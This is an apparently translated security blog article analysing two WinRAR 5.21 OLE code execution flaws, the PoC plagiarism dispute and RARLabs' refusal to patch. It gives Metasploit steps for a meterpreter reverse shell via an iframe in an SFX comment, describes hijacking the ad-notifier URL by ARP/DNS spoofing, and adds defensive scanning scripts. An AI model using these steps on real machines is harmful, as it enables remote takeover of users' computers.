Merit student · 2015/10/12 10:35
0x00 Preface
Late last month, a code execution vulnerability in WinRAR 5.21 was disclosed. Vulnerability Lab rated it high risk at 9 out of 10, and security researcher Mohammad Reza Espargham released a PoC in which opening an SFX file silently executes attack code. WinRAR's vendor, RARLabs, however, regards this function as necessary for software installers and sees no need to issue a patch or an upgraded version.
I had intended to skip this bug, but digging deeper turned up something even more interesting.
0x01 WinRAR 5.21 – SFX OLE Code Execution Vulnerability
1. Related concepts
SFX: a self-extracting archive is a compressed file that can be extracted without installing any compression software.
MS14-064: Microsoft Windows OLE remote code execution vulnerability, affecting every version from Win95 + IE3 through Win10 + IE11. In practice, on Windows 7 and later the IE sandbox means that launching a process outside the whitelist triggers a prompt, as shown in the figure.
2. Principle of the vulnerability
SFX archive creation supports embedding HTML script, and that HTML is not restricted by the IE sandbox. If the host is vulnerable to MS14-064, opening an SFX file that contains an MS14-064 exploit can execute arbitrary code silently.
3. Test environment
Windows 7 x86 with MS14-064 unpatched, WinRAR 5.21 installed
4. Test process
The implementation is relatively simple, so I’ll cover it briefly
(1) Set up the server
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.40.131
set LPORT 1234
exploit
As shown in figure
(2) Generate SFX
Right-click a file, choose Add to archive, tick Create SFX archive, click Advanced, then SFX options, then Text and icon.
Enter the following code in the Text to display in SFX window field:
<iframe src="http://192.168.40.131:8080/YrrArF9oTAQ7j"></iframe>
(3) Run the SFX file
Double-click it and the Meterpreter session comes online.
5. Analysis
- Adding HTML code to SFX files is a long-known method; a 2008 article on WinRAR drive-by ("hanging horse") attacks, for example: http://www.2cto.com/Article/200804/25081.html
- The highlight of this vulnerability is that it lets the MS14-064 exploit escape the IE sandbox.
- To check whether an SFX archive carries this kind of payload: if you come across a .exe archive, right-click it, open Properties, then the Comment tab, and inspect the contents, as shown in the figure below.
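The manual Properties/Comment check above can be automated. The following script is an added defensive example, not code from the original post: it reads a .exe, confirms that a RAR archive is embedded after the PE stub (which is what makes it an SFX), and looks for HTML constructs such as iframe or script tags that an installer's display text has no legitimate reason to contain. Two assumptions are labelled in the code: the SFX script `Text { ... }` layout used in the constructed sample, and that the comment is stored uncompressed so a raw byte scan can see it; a comment stored compressed would have to be extracted with unrar first, so a clean result from this scan is not proof of a clean file.

```python
import re
import sys
from pathlib import Path

# RAR archive signatures (RAR 4.x and RAR 5.x). A WinRAR SFX .exe is a PE stub
# followed by the archive, so the signature appears somewhere after the "MZ" header.
RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"

# HTML constructs that an installer's display text has no legitimate reason to carry.
SUSPICIOUS_TAGS = re.compile(rb"<\s*(iframe|script|object|embed|meta)\b[^>]*>", re.IGNORECASE)
# src= / href= targets, so the analyst can see where the text points.
URL_ATTR = re.compile(rb"""(?:src|href)\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def scan_sfx_bytes(data: bytes) -> dict:
    """Inspect one file image and return findings (nothing is printed here).

    Assumption: the SFX comment is stored uncompressed, so its HTML is visible
    in the raw bytes. A compressed comment needs unrar before this check applies.
    """
    is_pe = data[:2] == b"MZ"
    offsets = [pos for pos in (data.find(RAR5_SIG), data.find(RAR4_SIG)) if pos != -1]
    rar_offset = min(offsets) if offsets else -1
    is_rar_sfx = is_pe and rar_offset != -1
    tags = [m.group(1).lower().decode() for m in SUSPICIOUS_TAGS.finditer(data)]
    urls = [m.group(1).decode("latin-1") for m in URL_ATTR.finditer(data)]
    return {
        "is_pe": is_pe,
        "is_rar_sfx": is_rar_sfx,
        "rar_offset": rar_offset,
        "html_tags": tags,
        "urls": urls,
        "suspicious": is_rar_sfx and bool(tags),
    }


def scan_sfx_file(path: str) -> dict:
    """Same check for a file on disk, e.g. a downloaded .exe archive."""
    return scan_sfx_bytes(Path(path).read_bytes())


# Constructed samples (not real WinRAR output): a fake PE stub, a RAR5 signature, and an
# SFX comment whose Text block follows the assumed SFX script syntax.
_STUB = b"MZ" + b"\x00" * 62 + b"fake sfx stub"
SAMPLE_MALICIOUS = _STUB + RAR5_SIG + (
    b"Text\r\n{\r\n<iframe src=\"http://attacker.example:8080/payload\"></iframe>\r\n}\r\n"
)
SAMPLE_BENIGN = _STUB + RAR5_SIG + b"Text\r\n{\r\nThank you for installing.\r\n}\r\n"


if __name__ == "__main__":
    # Usage: python sfx_scan.py file1.exe file2.exe ...  (no arguments scans the samples)
    if len(sys.argv) > 1:
        for name in sys.argv[1:]:
            print(name, scan_sfx_file(name))
    else:
        print("malicious sample:", scan_sfx_bytes(SAMPLE_MALICIOUS))
        print("benign sample:   ", scan_sfx_bytes(SAMPLE_BENIGN))
```

The "suspicious" flag only fires when both conditions hold (embedded RAR archive and HTML tags), so ordinary PE files that merely contain HTML strings in resources are not reported; the URL list is there for triage, not as a verdict.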
0x02 The PoC mystery
Vulnerability Lab, Malwarebytes and various websites have all been keen to exaggerate this vulnerability, but the question of who actually authored the PoC turns out to be even more interesting.
The timeline below is assembled from the information collected:
1. The WinRAR 5.21 code execution vulnerability was disclosed on seclists.org, together with Mohammad Reza Espargham's PoC
Date: 28/09/2015
Related link: seclists.org/fulldisclos…
2. RARLabs' first response
Restricting the HTML functionality in SFX modules would affect legitimate users, and attackers could still use older SFX modules, custom modules built from the unrar source code, or home-built archives, so RARLabs refused to provide a patch and again reminded users to verify that any file comes from a trusted source.
Related link: www.rarlab.com/vuln_sfx_ht…
3. RARLabs' second response
In it, R-73EN (RioSherri) accused Mohammad Reza Espargham of copying his PoC code.
Related link: www.rarlab.com/vuln_sfx_ht…
4. 0day.today may prove the plagiarism
(1) R-73EN's PoC, posted first
Date: 25/09/2015
Related link: 0day.today/exploit/242…
(2) Mohammad Reza Espargham's PoC, posted afterwards
Date: 26-09-2015
Related link: cn.0day.today/exploits/242…
5. To prove his ability, R-73EN published a PoC for a second vulnerability: WinRAR (Expired Notification) OLE remote code execution
Date: 30-09-2015
Related link: 0day.today/exploit/243…
6. RARLabs responded to the second vulnerability published by R-73EN by refusing to fix it
- The trial version of WinRAR pops up a window prompting for registration, and this vulnerability may be exploited through it
- Exploitation conditions: the network is hijacked and the MS14-064 patch is not installed
- RARLabs also pointed out that if those conditions are met, the system itself is already insecure, which is beyond the scope of WinRAR
- It therefore refused to release a patch for this vulnerability
Related link: www.rarlab.com/vuln_web_ht…
0x03 WinRAR (Expired Notification & Advertising) OLE Remote Code Execution Vulnerability
Although RARLabs also ignored the WinRAR (out-of-date notification) OLE remote code execution vulnerability, the idea behind it is very interesting. The PoC published by R-73EN does, however, need partial modification to work in more WinRAR environments.
1. Relevant background
We often encounter the following situation when using WinRAR:
When WinRAR is opened, it pops up an advertisement prompting the user to pay to remove the ads. The ad link differs between WinRAR versions: http://www.win-rar.com/notifier/ for the international version, and http://www.winrar.com.cn/ad/*** for the Chinese version.
2. Principle of the vulnerability
By default, WinRAR requests specific URLs. If that request can be hijacked and the response replaced with MS14-064 attack code, arbitrary code executes remotely and escapes the IE sandbox.
3. Test environment
Win7 x86 with MS14-064 unpatched, WinRAR 5.21 Chinese edition installed
4. Test process
(1) Set up the server: download the PoC (related link: 0day.today/exploit/243…)
The PoC needs slight modification (the modification is not described here); then run the Python script, as shown.
Note: if you understand the MS14-064 vulnerability principle, the modification is easy.
(2) Redirect http://www.winrar.com.cn to the server IP address
ARP or DNS spoofing can be used.
(3) Open any file with WinRAR
The ad pops up by default, the bug triggers, and Calculator launches, as shown.
5. Analysis
- Although the conditions for this vulnerability are relatively restrictive, the idea is very instructive: the same approach can be tried against other software that opens web pages by default.
- By modifying the hosts file, the ad link can be permanently pointed at the server IP, which amounts to an alternative backdoor that launches with the program.
- Precautions against this vulnerability:
  - Prevent network hijacking
  - Install the MS14-064 patch
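The hosts-file variant of this hijack, and the first precaution above, can be checked from the defender's side. The script below is an added example and not part of the original article: it parses hosts-file content and reports any entry that pins one of WinRAR's notifier domains. An entry that points at loopback or 0.0.0.0 merely blocks the ad, while one that points anywhere else redirects the notifier request and is the case to investigate. The domain list holds only the two hosts named in the article and is an assumption to be extended for other WinRAR builds; the hosts-file path is the Windows default, and the sample hosts content is constructed.

```python
import ipaddress
import sys
from pathlib import Path

# Notifier / advertisement hosts named in the article (assumed list; other WinRAR
# builds may use other domains, so extend it for your environment).
WINRAR_NOTIFIER_HOSTS = {"www.win-rar.com", "www.winrar.com.cn"}

# Default hosts-file location on Windows; the functions below accept any path or text.
WINDOWS_HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"


def parse_hosts(text: str) -> list:
    """Return (ip, hostname) pairs, one per name, skipping comments and blank lines."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        fields = line.split()
        if len(fields) < 2:
            continue
        for name in fields[1:]:
            pairs.append((fields[0], name.lower()))
    return pairs


def _is_sinkhole(ip: str) -> bool:
    """Loopback or unspecified addresses only block the lookup; anything else redirects it."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable address: treat as a redirect worth a look
    return addr.is_loopback or addr.is_unspecified


def audit_hosts(text: str, watched=WINRAR_NOTIFIER_HOSTS) -> dict:
    """Classify every hosts entry for a watched domain as 'blocked' or 'redirected'."""
    result = {"blocked": [], "redirected": []}
    for ip, name in parse_hosts(text):
        if name in watched:
            result["blocked" if _is_sinkhole(ip) else "redirected"].append((ip, name))
    return result


def audit_hosts_file(path: str = WINDOWS_HOSTS_PATH) -> dict:
    """Run the audit against a hosts file on disk."""
    return audit_hosts(Path(path).read_text(encoding="utf-8", errors="replace"))


# Constructed sample hosts content, not taken from a real machine.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
0.0.0.0         ads.example.net        # user-added ad block, not a WinRAR host
192.168.40.131  www.winrar.com.cn      # notifier domain pinned to a LAN address
127.0.0.1       www.win-rar.com        # notifier domain sinkholed: blocks the ad only
"""


if __name__ == "__main__":
    # Usage: python hosts_audit.py [path-to-hosts-file]  (no argument audits the sample)
    if len(sys.argv) > 1:
        findings = audit_hosts_file(sys.argv[1])
    else:
        findings = audit_hosts(SAMPLE_HOSTS)
    for kind, entries in findings.items():
        for ip, name in entries:
            print(f"{kind}: {name} -> {ip}")
```

A redirected entry is not on its own proof of compromise (a user may have pinned the domain for testing), but combined with the article's second precaution it gives a quick answer to the question "could the notifier request on this machine be reaching anything other than the vendor?"; the DNS and ARP routes to the same hijack are not visible in the hosts file and need network-side monitoring.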
0x04 Summary
WinRAR has relatively few vulnerabilities, but whether other attacks can break through its officially declared security logic is worth further study.
This article was originally written by Merit student and first published on Wooyun Drops.